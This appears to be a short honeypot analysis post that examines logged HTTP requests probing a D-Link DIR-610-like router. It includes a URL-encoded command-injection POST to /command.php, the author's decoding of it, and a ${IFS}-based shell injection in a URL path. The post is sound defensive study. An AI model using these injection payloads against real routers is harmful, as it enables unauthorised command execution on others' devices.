Interesting to see is how the requests involved, like reported on a different post, I tend to believe that the "200 OK" actually causes the real exploit attempt.
translated with urllib.unqoute() to2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /cgi/common.cgi HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /stssys.htm HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'GET / HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'POST /command.php HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 208\r\n\r\ncmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74']}
ncmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt
After the first view attempts, the attacker should have a pretty good idea that the systems behaves like a DIR-610 system, as the honeypot tells that all urls tested before are actually present.
The command executed makes the file available which the attacker tries to download afterwards in the following call:
2017-01-09 16:53:57 -- {'http': ['181.223.38.29', 'GET /language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
